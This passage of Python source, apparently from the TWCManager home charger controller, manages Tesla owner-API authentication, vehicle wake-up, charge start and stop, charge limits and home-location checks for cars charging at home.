logger.log(logging.INFO8, "Attempting token refresh")
self.apiRefresh()
elif email is not None and password is not None:
logger.log(logging.INFO8, "Attempting password auth")
ret = self.apiLogin(email, password)
# If any string is returned, we redirect to it. This helps with MFA login flow
if (
str(ret) != "True"
and str(ret) != "False"
and str(ret) != ""
and str(ret) != "None"
):
return ret
if self.getCarApiBearerToken() != "":
if self.getVehicleCount() < 1:
url = "https://owner-api.teslamotors.com/api/1/vehicles"
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
try:
req = requests.get(url, headers=headers)
logger.log(logging.INFO8, "Car API cmd vehicles " + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
logger.info("Failed to make API call " + url)
logger.log(logging.INFO6, "Response: " + req.text)
pass
except json.decoder.JSONDecodeError:
logger.info("Could not parse JSON result from " + url)
logger.log(logging.INFO6, "Response: " + req.text)
pass
try:
logger.debug("Car API vehicle list" + str(apiResponseDict) + "\n")
for i in range(0, apiResponseDict["count"]):
self.addVehicle(apiResponseDict["response"][i])
self.resetCarApiLastErrorTime()
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
logger.log(
logging.INFO2,
"ERROR: Can't get list of vehicles via Tesla car API. Will try again in "
+ str(self.getCarApiErrorRetryMins())
+ " minutes.",
)
self.updateCarApiLastErrorTime()
return False
if self.getVehicleCount() > 0 and (charge or applyLimit):
# Wake cars if needed
for vehicle in self.getCarApiVehicles():
if charge is True and vehicle.stopAskingToStartCharging:
# Vehicle is in a state (complete or charging) already
# which doesn't make sense for us to keep requesting it
# to start charging, so we will stop.
logger.log(
logging.DEBUG2,
"Don't repeatedly request API to charge "
+ vehicle.name
+ ", because vehicle.stopAskingToStartCharging "
+ " == True - it has already been requested.",
)
continue
if applyLimit is True and vehicle.stopTryingToApplyLimit:
logger.log(
logging.DEBUG2,
"Don't wake "
+ vehicle.name
+ " to set the charge limit - it has already been set",
)
continue
if self.getCarApiRetryRemaining():
# It's been under carApiErrorRetryMins minutes since the car
# API generated an error on this vehicle. Don't send it more
# commands yet.
logger.log(
logging.DEBUG2,
"Don't send commands to "
+ vehicle.name
+ " because it returned an error in the last "
+ str(self.getCarApiErrorRetryMins())
+ " minutes.",
)
continue
if vehicle.ready():
continue
if now - vehicle.lastAPIAccessTime <= vehicle.delayNextWakeAttempt:
logger.debug(
"car_api_available returning False because we are still delaying "
+ str(vehicle.delayNextWakeAttempt)
+ " seconds after the last failed wake attempt."
)
return False
# It's been delayNextWakeAttempt seconds since we last failed to
# wake the car, or it's never been woken. Wake it.
apiResponseDict = self.wakeVehicle(vehicle)
state = "error"
logger.debug("Car API wake car response" + str(apiResponseDict))
try:
state = apiResponseDict["response"]["state"]
self.resetCarApiLastErrorTime()
except (KeyError, TypeError):
# This catches unexpected cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist
# in apiResponseDict.
state = "error"
if state == "online":
# With max power saving settings, car will almost always
# report 'asleep' or 'offline' the first time it's sent
# wake_up. Rarely, it returns 'online' on the first wake_up
# even when the car has not been contacted in a long while.
# I suspect that happens when we happen to query the car
# when it periodically awakens for some reason.
vehicle.firstWakeAttemptTime = 0
vehicle.delayNextWakeAttempt = 0
# Don't alter vehicle.lastAPIAccessTime because
# vehicle.ready() uses it to return True if the last wake
# was under 2 mins ago.
needSleep = True
else:
if vehicle.firstWakeAttemptTime == 0:
vehicle.firstWakeAttemptTime = now
if state == "asleep" or state == "waking":
self.resetCarApiLastErrorTime()
if now - vehicle.firstWakeAttemptTime <= 10 * 60:
# http://visibletesla.com has a 'force wakeup' mode
# that sends wake_up messages once every 5 seconds
# 15 times. This generally manages to wake my car if
# it's returning 'asleep' state, but I don't think
# there is any reason for 5 seconds and 15 attempts.
# The car did wake in two tests with that timing,
# but on the third test, it had not entered online
# mode by the 15th wake_up and took another 10+
# seconds to come online. In general, I hear relays
# in the car clicking a few seconds after the first
# wake_up but the car does not enter 'waking' or
# 'online' state for a random period of time. I've
# seen it take over one minute, 20 sec.
#
# I interpret this to mean a car in 'asleep' mode is
# still receiving car API messages and will start
# to wake after the first wake_up, but it may take
# awhile to finish waking up. Therefore, we try
# waking every 30 seconds for the first 10 mins.
vehicle.delayNextWakeAttempt = 30
elif now - vehicle.firstWakeAttemptTime <= 70 * 60:
# Cars in 'asleep' state should wake within a
# couple minutes in my experience, so we should
# never reach this point. If we do, try every 5
# minutes for the next hour.
vehicle.delayNextWakeAttempt = 5 * 60
else:
# Car hasn't woken for an hour and 10 mins. Try
# again in 15 minutes. We'll show an error about
# reaching this point later.
vehicle.delayNextWakeAttempt = 15 * 60
elif state == "offline":
self.resetCarApiLastErrorTime()
# In any case it can make sense to wait 5 seconds here.
# I had the issue, that the next command was sent too
# fast and only a reboot of the Raspberry resultet in
# possible reconnect to the API (even the Tesla App
# couldn't connect anymore).
time.sleep(5)
if now - vehicle.firstWakeAttemptTime <= 31 * 60:
# A car in offline state is presumably not connected
# wirelessly so our wake_up command will not reach
# it. Instead, the car wakes itself every 20-30
# minutes and waits some period of time for a
# message, then goes back to sleep. I'm not sure
# what the period of time is, so I tried sending
# wake_up every 55 seconds for 16 minutes but the
# car failed to wake.
# Next I tried once every 25 seconds for 31 mins.
# This worked after 19.5 and 19.75 minutes in 2
# tests but I can't be sure the car stays awake for
# 30secs or if I just happened to send a command
# during a shorter period of wakefulness.
vehicle.delayNextWakeAttempt = 25
# I've run tests sending wake_up every 10-30 mins to
# a car in offline state and it will go hours
# without waking unless you're lucky enough to hit
# it in the brief time it's waiting for wireless
# commands. I assume cars only enter offline state
# when set to max power saving mode, and even then,
# they don't always enter the state even after 8
# hours of no API contact or other interaction. I've
# seen it remain in 'asleep' state when contacted
# after 16.5 hours, but I also think I've seen it in
# offline state after less than 16 hours, so I'm not
# sure what the rules are or if maybe Tesla contacts
# the car periodically which resets the offline
# countdown.
#
# I've also seen it enter 'offline' state a few
# minutes after finishing charging, then go 'online'
# on the third retry every 55 seconds. I suspect
# that might be a case of the car briefly losing
# wireless connection rather than actually going
# into a deep sleep.
# 'offline' may happen almost immediately if you
# don't have the charger plugged in.
else:
# Handle 'error' state.
self.updateCarApiLastErrorTime()
if now - vehicle.firstWakeAttemptTime >= 60 * 60:
# Car hasn't woken for over an hour. Try again
# in 15 minutes. We'll show an error about this
# later.
vehicle.delayNextWakeAttempt = 15 * 60
if state == "error":
logger.info(
"Car API wake car failed with unknown response. "
+ "Will try again in "
+ str(vehicle.delayNextWakeAttempt)
+ " seconds."
)
else:
logger.info(
"Car API wake car failed. State remains: '"
+ state
+ "'. Will try again in "
+ str(vehicle.delayNextWakeAttempt)
+ " seconds."
)
if (
vehicle.firstWakeAttemptTime > 0
and now - vehicle.firstWakeAttemptTime > 60 * 60
):
# It should never take over an hour to wake a car. If it
# does, ask user to report an error.
logger.info(
"ERROR: We have failed to wake a car from '"
+ state
+ "' state for %.1f hours.\n"
"Please file an issue at https://github.com/ngardiner/TWCManager/. "
"Also include this: %s"
% (
((now - vehicle.firstWakeAttemptTime) / 60 / 60),
str(apiResponseDict),
)
)
if (
now - self.getCarApiLastErrorTime() < (self.getCarApiErrorRetryMins() * 60)
or self.getCarApiBearerToken() == ""
):
logger.log(
logging.INFO8,
"car_api_available returning False because of recent carApiLasterrorTime "
+ str(now - self.getCarApiLastErrorTime())
+ " or empty carApiBearerToken '"
+ self.getCarApiBearerToken()
+ "'",
)
return False
# We return True to indicate there was no error that prevents running
# car API commands and that we successfully got a list of vehicles.
# True does not indicate that any vehicle is actually awake and ready
# for commands.
logger.log(logging.INFO8, "car_api_available returning True")
if needSleep:
# If you send charge_start/stop less than 1 second after calling
# update_location(), the charge command usually returns:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# I'm not sure if the same problem exists when sending commands too
# quickly after we send wake_up. I haven't seen a problem sending a
# command immediately, but it seems safest to sleep 5 seconds after
# waking before sending a command.
time.sleep(5)
return True
def generateChallenge(self):
self.__apiVerifier = base64.urlsafe_b64encode(os.urandom(86)).rstrip(b"=")
self.__apiChallenge = base64.urlsafe_b64encode(
hashlib.sha256(self.__apiVerifier).digest()
).rstrip(b"=")
self.__apiState = (
base64.urlsafe_b64encode(os.urandom(16)).rstrip(b"=").decode("utf-8")
)
def getApiChallenge(self):
return (
self.__apiChallenge.decode("UTF-8"),
self.__apiState,
self.__apiVerifier,
)
def is_location_home(self, lat, lon):
if self.master.getHomeLatLon()[0] == 10000:
logger.info(
"Home location for vehicles has never been set. "
+ "We'll assume home is where we found the first vehicle currently parked. "
+ "Home set to lat="
+ str(lat)
+ ", lon="
+ str(lon)
)
self.master.setHomeLat(lat)
self.master.setHomeLon(lon)
self.master.queue_background_task({"cmd": "saveSettings"})
self.master.queue_background_task({"cmd": "sunrise"})
return True
# 1 lat or lon = ~364488.888 feet. The exact feet is different depending
# on the value of latitude, but this value should be close enough for
# our rough needs.
# 1/364488.888 * 10560 = 0.0289.
# So if vehicle is within 0289 lat and lon of homeLat/Lon,
# it's within ~10560 feet (2 miles) of home and we'll consider it to be
# at home.
# I originally tried using 0.00548 (~2000 feet) but one night the car
# consistently reported being 2839 feet away from home despite being
# parked in the exact spot I always park it. This is very odd because
# GPS is supposed to be accurate to within 12 feet. Tesla phone app
# also reports the car is not at its usual address. I suspect this
# is another case of a bug that's been causing car GPS to freeze the
# last couple months.
if (
abs(self.master.getHomeLatLon()[0] - lat) > 0.0289
or abs(self.master.getHomeLatLon()[1] - lon) > 0.0289
):
return False
return True
def car_api_charge(self, charge):
# Do not call this function directly. Call by using background thread:
# queue_background_task({'cmd':'charge', 'charge':<True/False>})
now = time.time()
apiResponseDict = {}
if not charge:
# Whenever we are going to tell vehicles to stop charging, set
# vehicle.stopAskingToStartCharging = False on all vehicles.
for vehicle in self.getCarApiVehicles():
vehicle.stopAskingToStartCharging = False
if now - self.getLastStartOrStopChargeTime() < 60:
# Don't start or stop more often than once a minute
logger.log(
logging.DEBUG2,
"car_api_charge return because not long enough since last carApiLastStartOrStopChargeTime",
)
return "error"
if self.car_api_available(charge=charge) is False:
logger.log(
logging.INFO8,
"car_api_charge return because car_api_available() == False",
)
return "error"
startOrStop = "start" if charge else "stop"
result = "success"
logger.log(logging.INFO8, "startOrStop is set to " + str(startOrStop))
for vehicle in self.getCarApiVehicles():
if charge and vehicle.stopAskingToStartCharging:
logger.log(
logging.INFO8,
"Don't charge "
+ vehicle.name
+ " because vehicle.stopAskingToStartCharging == True",
)
continue
if not vehicle.ready():
continue
if (
vehicle.update_charge()
and vehicle.batteryLevel < self.minChargeLevel
and not charge
):
# If the vehicle's charge state is lower than the configured minimum,
# don't stop it from charging, even if we'd otherwise not charge.
continue
# Only update carApiLastStartOrStopChargeTime if car_api_available() managed
# to wake cars. Setting this prevents any command below from being sent
# more than once per minute.
self.updateLastStartOrStopChargeTime()
if (
self.config["config"]["onlyChargeMultiCarsAtHome"]
and self.getVehicleCount() > 1
):
# When multiple cars are enrolled in the car API, only start/stop
# charging cars parked at home.
if vehicle.update_location() is False:
result = "error"
continue
if not vehicle.atHome:
# Vehicle is not at home, so don't change its charge state.
logger.info(
vehicle.name
+ " is not at home. Do not "
+ startOrStop
+ " charge."
)
continue
# If you send charge_start/stop less than 1 second after calling
# update_location(), the charge command usually returns:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# Waiting 2 seconds seems to consistently avoid the error, but let's
# wait 5 seconds in case of hardware differences between cars.
time.sleep(5)
if charge:
self.applyChargeLimit(self.lastChargeLimitApplied, checkArrival=True)
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(vehicle.ID) + "/command/charge_" + startOrStop
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
# Retry up to 3 times on certain errors.
for _ in range(0, 3):
try:
req = requests.post(url, headers=headers)
logger.log(
logging.INFO8,
"Car API cmd charge_" + startOrStop + " " + str(req),
)
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
pass
except json.decoder.JSONDecodeError:
pass
try:
logger.log(
logging.INFO4,
vehicle.name
+ ": "
+ startOrStop
+ " charge response"
+ str(apiResponseDict),
)
# Responses I've seen in apiResponseDict:
# Car is done charging:
# {'response': {'result': False, 'reason': 'complete'}}
# Car wants to charge but may not actually be charging. Oddly, this
# is the state reported when car is not plugged in to a charger!
# It's also reported when plugged in but charger is not offering
# power or even when the car is in an error state and refuses to
# charge.
# {'response': {'result': False, 'reason': 'charging'}}
# Car not reachable:
# {'response': None, 'error_description': '', 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}'}
# This weird error seems to happen randomly and re-trying a few
# seconds later often succeeds:
# {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
# I've seen this a few times on wake_up, charge_start, and drive_state:
# {'error': 'upstream internal error', 'response': None, 'error_description': ''}
# I've seen this once on wake_up:
# {'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}', 'response': None, 'error_description': ''}
# Start or stop charging success:
# {'response': {'result': True, 'reason': ''}}
if apiResponseDict["response"] is None:
# This generally indicates an error like 'vehicle
# unavailable', but it's not something I think the caller can do
# anything about, so return generic 'error'.
result = "error"
# Don't send another command to this vehicle for
# carApiErrorRetryMins mins.
self.updateCarApiLastErrorTime(vehicle)
else:
if apiResponseDict["response"]["result"] == True:
self.resetCarApiLastErrorTime(vehicle)
elif charge:
reason = apiResponseDict["response"]["reason"]
if reason == "complete" or reason == "charging":
# We asked the car to charge, but it responded that
# it can't, either because it's reached target
# charge state (reason == 'complete'), or it's
# already trying to charge (reason == 'charging').
# In these cases, it won't help to keep asking it to
# charge, so set vehicle.stopAskingToStartCharging =
# True.
#
# Remember, this only means at least one car in the
# list wants us to stop asking and we don't know
# which car in the list is connected to our TWC.
logger.info(
vehicle.name
+ " is done charging or already trying to charge. Stop asking to start charging."
)
vehicle.stopAskingToStartCharging = True
self.resetCarApiLastErrorTime(vehicle)
elif reason == "could_not_wake_buses":
# This error often happens if you call
# charge_start too quickly after another command
# like drive_state. Even if you delay 5 seconds
# between the commands, this error still comes
# up occasionally. Retrying often succeeds, so
# wait 5 secs and retry.
# If all retries fail, we'll try again in a
# minute because we set
# carApiLastStartOrStopChargeTime = now earlier.
time.sleep(5)
continue
else:
# Start charge failed with an error I
# haven't seen before, so wait
# carApiErrorRetryMins mins before trying again.
logger.info(
'ERROR "'
+ reason
+ '" when trying to '
+ startOrStop
+ " car charging via Tesla car API. Will try again later."
+ "\nIf this error persists, please file an issue at https://github.com/ngardiner/TWCManager/ with a copy of this error.",
)
result = "error"
self.updateCarApiLastErrorTime(vehicle)
else:
# Stop charge failed with an error I
# haven't seen before, so wait
# carApiErrorRetryMins mins before trying again.
reason = apiResponseDict["response"]["reason"]
logger.info(
'ERROR "'
+ reason
+ '" when trying to '
+ startOrStop
+ " car charging via Tesla car API. Will try again later."
+ "\nIf this error persists, please file an issue at https://github.com/ngardiner/TWCManager/ with a copy of this error.",
)
result = "error"
self.updateCarApiLastErrorTime(vehicle)
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
logger.info(
"ERROR: Failed to "
+ startOrStop
+ " car charging via Tesla car API. Will try again later."
)
self.updateCarApiLastErrorTime(vehicle)
break
if self.getLastStartOrStopChargeTime() == now:
logger.info("Car API " + startOrStop + " charge result: " + result)
return result
def applyChargeLimit(self, limit, checkArrival=False, checkDeparture=False):
if limit != -1 and (limit < 50 or limit > 100):
logger.log(logging.INFO8, "applyChargeLimit skipped")
return "error"
if not self.car_api_available():
logger.log(
logging.INFO8,
"applyChargeLimit return because car_api_available() == False",
)
return "error"
now = time.time()
if (
not checkArrival
and not checkDeparture
and now - self.carApiLastChargeLimitApplyTime < 60
):
# Don't change limits more often than once a minute
logger.log(
logging.DEBUG2,
"applyChargeLimit return because under 60 sec since last carApiLastChargeLimitApplyTime",
)
return "error"
# We need to try to apply limits if:
# - We think the car is at home and the limit has changed
# - We think the car is at home and we've been asked to check for departures
# - We think the car is at home and we notice it gone
# - We think the car is away from home and we've been asked to check for arrivals
#
# We do NOT opportunistically check for arrivals, because that would be a
# continuous API poll.
needToWake = False
for vehicle in self.carApiVehicles:
(wasAtHome, outside, lastApplied) = self.master.getNormalChargeLimit(
vehicle.ID
)
# Don't wake cars to tell them about reduced limits;
# only wake if they might be able to charge further now
if wasAtHome and (limit > (lastApplied if lastApplied != -1 else outside)):
needToWake = True
vehicle.stopAskingToStartCharging = False
if (
wasAtHome
and (
limit != lastApplied
or checkDeparture
or (vehicle.update_location(cacheTime=3600) and not vehicle.atHome)
)
) or (not wasAtHome and checkArrival):
vehicle.stopTryingToApplyLimit = False
if needToWake and self.car_api_available(applyLimit=True) is False:
logger.log(
logging.INFO8,
"applyChargeLimit return because car_api_available() == False",
)
return "error"
if self.lastChargeLimitApplied != limit:
if limit != -1:
logger.log(
logging.INFO2,
"Attempting to apply limit of "
+ str(limit)
+ "% to all vehicles at home",
)
else:
logger.log(
logging.INFO2,
"Attempting to restore charge limits for all vehicles at home",
)
self.lastChargeLimitApplied = limit
self.carApiLastChargeLimitApplyTime = now
needSleep = False
for vehicle in self.carApiVehicles:
if vehicle.stopTryingToApplyLimit or not vehicle.ready():
continue
located = vehicle.update_location()
(wasAtHome, outside, lastApplied) = self.master.getNormalChargeLimit(
vehicle.ID
)
forgetVehicle = False
if not vehicle.update_charge():
# We failed to read the "normal" limit; don't risk changing it.
continue
if not wasAtHome and located and vehicle.atHome:
logger.log(logging.INFO2, vehicle.name + " has arrived")
outside = vehicle.chargeLimit
elif wasAtHome and located and not vehicle.atHome:
logger.log(logging.INFO2, vehicle.name + " has departed")
forgetVehicle = True
if limit == -1 or (located and not vehicle.atHome):
# We're removing any applied limit, provided it hasn't been manually changed
#
# If lastApplied == -1, the manual-change path is always selected.
if wasAtHome and vehicle.chargeLimit == lastApplied:
if vehicle.apply_charge_limit(outside):
logger.log(
logging.INFO2,
"Restoring "
+ vehicle.name
+ " to charge limit "
+ str(outside)
+ "%",
)
vehicle.stopTryingToApplyLimit = True
else:
# If the charge limit has been manually changed, user action overrides the
# saved charge limit. Leave it alone.
vehicle.stopTryingToApplyLimit = True
outside = vehicle.chargeLimit
if vehicle.stopTryingToApplyLimit:
if forgetVehicle:
self.master.removeNormalChargeLimit(vehicle.ID)
else:
self.master.saveNormalChargeLimit(vehicle.ID, outside, -1)
else:
if vehicle.chargeLimit != limit:
if vehicle.apply_charge_limit(limit):
logger.log(
logging.INFO2,
"Set "
+ vehicle.name
+ " to charge limit of "
+ str(limit)
+ "%",
)
vehicle.stopTryingToApplyLimit = True
else:
vehicle.stopTryingToApplyLimit = True
if vehicle.stopTryingToApplyLimit:
self.master.saveNormalChargeLimit(vehicle.ID, outside, limit)
if vehicle.atHome and vehicle.stopTryingToApplyLimit:
needSleep = True
if needSleep:
# If you start charging too quickly after setting the charge limit,
# the vehicle sometimes refuses the start command because it's
# "fully charged" under the old limit, but then continues to say
# charging was stopped once the new limit is in place.
time.sleep(5)
if checkArrival:
self.updateChargeAtHome()
def getCarApiBearerToken(self):
return self.carApiBearerToken
def getCarApiErrorRetryMins(self, vehicle=None):
errorCount = self.errorCount
if vehicle:
errorCount = max(vehicle.errorCount, errorCount)
errorCount = max(errorCount - 1, 0)
return min(errorCount, 10)
def getCarApiLastErrorTime(self):
return self.carApiLastErrorTime
def getCarApiRefreshToken(self):
return self.carApiRefreshToken
def getCarApiRetryRemaining(self, vehicle=None):
# Calculate the amount of time remaining until the API can be queried
# again. This is the api backoff time minus the difference between now
# and the last error time
# The optional vehicleLast parameter allows passing the last error time
# for an individual vehicle, rather than the entire API.
lastError = self.getCarApiLastErrorTime()
if vehicle:
lastError = max(vehicle.lastErrorTime, lastError)
if lastError == 0:
return 0
else:
backoff = self.getCarApiErrorRetryMins(vehicle) * 60
lasterrortime = time.time() - lastError
if lasterrortime >= backoff:
return 0
else:
logger.log(
logging.DEBUG2,
"Backoff is "
+ str(backoff)
+ ", lasterror delta is "
+ str(lasterrortime)
+ ", last error was "
+ str(lastError),
)
return int(backoff - lasterrortime)
def getCarApiTokenExpireTime(self):
return self.carApiTokenExpireTime
def getLastStartOrStopChargeTime(self):
return int(self.carApiLastStartOrStopChargeTime)
def getVehicleByID(self, vehicleID):
# Returns the vehicle object identified by the given ID
for vehicle in self.getCarApiVehicles():
if vehicle.ID == vehicleID:
return vehicle
return False
def getVehicleCount(self):
# Returns the number of currently tracked vehicles
return int(len(self.carApiVehicles))
def getCarApiVehicles(self):
return self.carApiVehicles
def resetCarApiLastErrorTime(self, vehicle=None):
self.carApiLastErrorTime = 0
if vehicle:
vehicle.lastErrorTime = 0
vehicle.errorCount = 0
self.errorCount = 0
return True
def saveApiToken(self, url):
# Extract code from url
if isinstance(url, bytes):
url = url.decode("UTF-8")
code = re.search(r"code=(.+)&state=(.+)", url)
logger.log(logging.INFO2, "Code: " + code.group(1))
logger.log(logging.INFO2, "State: " + code.group(2))
# Exchange auth code for bearer token
headers = {"accept": "application/json", "Content-Type": "application/json"}
data = {
"client_id": "ownerapi",
"grant_type": "authorization_code",
"code": str(code.group(1)),
"code_verifier": self.__apiVerifier.decode("UTF-8"),
"redirect_uri": self.__callbackURL,
}
req = None
now = time.time()
try:
req = requests.post(self.__authURL, headers=headers, json=data)
logger.log(logging.INFO2, "Car API request" + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
logger.error("Request Exception parsing API Token Exchange Response")
pass
except ValueError:
pass
except json.decoder.JSONDecodeError:
logger.error("JSON Decode Error parsing API Token Exchange Response")
pass
params = json.loads(req.text)
# Check for errors
if "error" in params:
return params["error"]
if "access_token" in params:
try:
self.setCarApiBearerToken(params["access_token"])
self.setCarApiRefreshToken(params["refresh_token"])
self.setCarApiTokenExpireTime(time.time() + params["expires_in"])
self.master.queue_background_task({"cmd": "saveSettings"})
return "success"
except KeyError:
logger.log(
logging.INFO2,
"ERROR: Can't access Tesla car via API. Please log in again via web interface.",
)
self.updateCarApiLastErrorTime()
return "response_no_token"
logger.log(logging.INFO2, str(req))
logger.log(logging.INFO2, req.text)
return "unknown"
def setCarApiBearerToken(self, token=None):
if token:
if self.master.tokenSyncEnabled():
# We won't accept tokens if Token Sync is already in place
return False
else:
self.carApiBearerToken = token
return True
else:
return False
def setCarApiRefreshToken(self, token):
self.carApiRefreshToken = token
return True
def setCarApiTokenExpireTime(self, value):
self.carApiTokenExpireTime = value
return True
def setChargeRate(self, charge_rate, vehicle=None):
# As a fallback to allow initial implementation of the charge rate functionality for single car installs,
# If no vehcle is specified, we take the first returned to us.
if not vehicle:
vehicle = self.getCarApiVehicles()[0]
vehicle.lastAPIAccessTime = time.time()
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(vehicle.ID) + "/command/set_charging_amps"
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
body = {"charging_amps": charge_rate}
try:
req = requests.post(url, headers=headers, json=body)
logger.log(logging.INFO8, "Car API cmd set_charging_amps" + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
return False
except json.decoder.JSONDecodeError:
return False
return apiResponseDict
def updateCarApiLastErrorTime(self, vehicle=None):
timestamp = time.time()
logger.log(
logging.INFO8,
"updateCarApiLastErrorTime() called due to Tesla API Error. Updating timestamp from "
+ str(self.carApiLastErrorTime)
+ " to "
+ str(timestamp),
)
if vehicle:
vehicle.lastErrorTime = timestamp
vehicle.errorCount += 1
else:
self.carApiLastErrorTime = timestamp
self.errorCount += 1
return True
def updateLastStartOrStopChargeTime(self):
self.carApiLastStartOrStopChargeTime = time.time()
return True
def updateChargeAtHome(self):
for car in self.carApiVehicles:
if car.atHome:
car.update_charge()
self.lastChargeCheck = time.time()
def wakeVehicle(self, vehicle):
apiResponseDict = None
vehicle.lastAPIAccessTime = time.time()
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(vehicle.ID) + "/wake_up"
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.getCarApiBearerToken(),
}
try:
req = requests.post(url, headers=headers)
logger.log(logging.INFO8, "Car API cmd wake_up" + str(req))
apiResponseDict = json.loads(req.text)
except requests.exceptions.RequestException:
return False
except json.decoder.JSONDecodeError:
return False
return apiResponseDict
@property
def numCarsAtHome(self):
return len([car for car in self.carApiVehicles if car.atHome])
@property
def minBatteryLevelAtHome(self):
if time.time() - self.lastChargeCheck > self.chargeUpdateInterval:
self.master.queue_background_task({"cmd": "checkCharge"})
return min(
[car.batteryLevel for car in self.carApiVehicles if car.atHome],
default=10000,
)
class CarApiVehicle:
carapi = None
__config = None
debuglevel = 0
ID = None
name = ""
syncSource = "TeslaAPI"
VIN = ""
firstWakeAttemptTime = 0
lastAPIAccessTime = 0
delayNextWakeAttempt = 0
lastLimitAttemptTime = 0
errorCount = 0
lastErrorTime = 0
lastDriveStatusTime = 0
lastChargeStatusTime = 0
stopAskingToStartCharging = False
stopTryingToApplyLimit = False
batteryLevel = 10000
chargeLimit = -1
lat = 10000
lon = 10000
atHome = False
timeToFullCharge = 0.0
# Sync values are updated by an external module such as TeslaMate
syncTimestamp = 0
syncTimeout = 60 * 60
syncLat = 10000
syncLon = 10000
syncState = "asleep"
def __init__(self, json, carapi, config):
self.carapi = carapi
self.__config = config
self.ID = json["id"]
self.VIN = json["vin"]
self.name = json["display_name"]
# Launch sync monitoring thread
Thread(target=self.checkSyncNotStale).start()
def checkSyncNotStale(self):
# Once an external system begins providing sync functionality to defer
# Tesla API queries and provide already fetched information, there is a
# potential condition which may occur in which the external system goes
# away and leaves us with stale data.
# To guard against this, this threaded function will loop every x minutes
# and check the last sync timestamp. If it has not updated in that interval,
# we switch back to using the API
while True:
if (
self.syncSource != "TeslaAPI"
and self.self.is_awake()
and (self.syncTimestamp < (time.time() - self.syncTimeout))
):
logger.error(
"Data from "
+ self.syncSource
+ " for "
+ self.name
+ " is stale. Switching back to TeslaAPI"
)
self.syncSource = "TeslaAPI"
time.sleep(self.syncTimeout)
def ready(self):
if self.carapi.getCarApiRetryRemaining(self):
# It's been under carApiErrorRetryMins minutes since the car API
# generated an error on this vehicle. Return that car is not ready.
logger.log(
logging.INFO8,
self.name
+ " not ready because of recent lastErrorTime "
+ str(self.lastErrorTime),
)
return False
if (
self.firstWakeAttemptTime == 0
and time.time() - self.lastAPIAccessTime < 2 * 60
):
# If it's been less than 2 minutes since we successfully woke this car, it
# should still be awake. No need to check. It returns to sleep state about
# two minutes after the last command was issued.
return True
# This can check whether the car is online; if so, it will likely stay online for
# two minutes.
if self.is_awake():
self.firstWakeAttemptTime = 0
return True
logger.log(
logging.INFO8,
self.name + " not ready because it wasn't woken in the last 2 minutes.",
)
return False
# Permits opportunistic API requests
def is_awake(self):
if self.syncSource == "TeslaAPI":
url = "https://owner-api.teslamotors.com/api/1/vehicles/" + str(self.ID)
(result, response) = self.get_car_api(
url, checkReady=False, provesOnline=False
)
return result and response.get("state", "") == "online"
else:
return (
self.syncState == "online"
or self.syncState == "charging"
or self.syncState == "updating"
or self.syncState == "driving"
)
def get_car_api(self, url, checkReady=True, provesOnline=True):
if checkReady and not self.ready():
return False, None
apiResponseDict = {}
headers = {
"accept": "application/json",
"Authorization": "Bearer " + self.carapi.getCarApiBearerToken(),
}
# Retry up to 3 times on certain errors.
for _ in range(0, 3):
try:
req = requests.get(url, headers=headers)
logger.log(logging.INFO8, "Car API cmd " + url + " " + str(req))
apiResponseDict = json.loads(req.text)
# This error can happen here as well:
# {'response': {'reason': 'could_not_wake_buses', 'result': False}}
# This one is somewhat common:
# {'response': None, 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}', 'error_description': ''}
except requests.exceptions.RequestException:
pass
except json.decoder.JSONDecodeError:
pass
try:
logger.debug("Car API vehicle status" + str(apiResponseDict))
response = apiResponseDict["response"]
# A successful call to drive_state will not contain a
# response['reason'], so we check if the 'reason' key exists.
if (
"reason" in response
and response["reason"] == "could_not_wake_buses"
):
# Retry after 5 seconds. See notes in car_api_charge where
# 'could_not_wake_buses' is handled.
time.sleep(5)
continue
except (KeyError, TypeError):
# This catches cases like trying to access
# apiResponseDict['response'] when 'response' doesn't exist in
# apiResponseDict.
logger.info(
"ERROR: Can't access vehicle status for "
+ self.name
+ ". Will try again later."
)
self.carapi.updateCarApiLastErrorTime(self)
return False, None
if provesOnline:
self.lastAPIAccessTime = time.time()
return (True, response)
else:
self.carapi.updateCarApiLastErrorTime(self)
return (False, None)
def update_location(self, cacheTime=60):
if self.syncSource == "TeslaAPI":
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(self.ID) + "/data_request/drive_state"
now = time.time()
if now - self.lastDriveStatusTime < cacheTime:
return True
try:
(result, response) = self.get_car_api(url)
except TypeError:
logger.log(logging.error, "Got None response from get_car_api()")
return False
if result:
self.lastDriveStatusTime = now
self.lat = response["latitude"]
self.lon = response["longitude"]
self.atHome = self.carapi.is_location_home(self.lat, self.lon)
return result
else:
self.lat = self.syncLat
self.lon = self.syncLon
self.atHome = self.carapi.is_location_home(self.lat, self.lon)
return True
def update_charge(self):
if self.syncSource == "TeslaAPI":
url = "https://owner-api.teslamotors.com/api/1/vehicles/"
url = url + str(self.ID) + "/data_request/charge_state"
now = time.time()
if now - self.lastChargeStatusTime < 60:
return True
try:
(result, response) = self.get_car_api(url)
except TypeError:
logger.log(logging.error, "Got None response from get_car_api()")
return False
if result:
self.lastChargeStatusTime = time.time()
self.chargeLimit = response["charge_limit_soc"]
self.batteryLevel = response["battery_level"]
self.timeToFullCharge = response["time_to_full_charge"]
return result
else:
return True
